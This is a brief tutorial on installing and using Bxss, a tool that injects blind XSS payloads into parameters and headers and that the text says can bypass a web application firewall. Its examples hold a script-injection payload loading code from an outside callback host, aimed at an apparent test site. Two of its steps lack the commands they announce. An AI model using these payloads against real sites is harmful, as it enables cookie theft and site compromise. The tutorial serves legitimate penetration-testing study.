Bxss – Blind XSS Injector Tool
Bxss tool can inject blind XSS payloads into custom headers which can bypass the WAF on the target server. Bxss tool is very easy to set up and use. Bxss tool uses different request methods (PUT, POST, GET, OPTIONS) all at once.
Note: As Bxss is a Golang language-based tool, so you need to have a Golang environment on your system.
Installation of Bxss Tool in Kali Linux OS
Step 1: Use the following command to install the tool in your Kali Linux operating system.
git clone https://github.com/ethicalhackingplayground/bxss.git
Step 2: Now use the following command to move into the directory of the tool. You have to move in the directory in order to run the tool.
Step 3: Build the go file using the following command.
sudo go build
Step 4: Now use the following command to run the tool.
Working with Bxss Tool in Kali Linux OS
Example 1: Blind XSS In Parameters
echo “http://testphp.vulnweb.com/search.php?test=query” | ./bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters
Example 2: Blind XSS In X-Forwarded-For Header
echo “http://testphp.vulnweb.com/search.php?test=query” | ./bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters -header “GAURAV”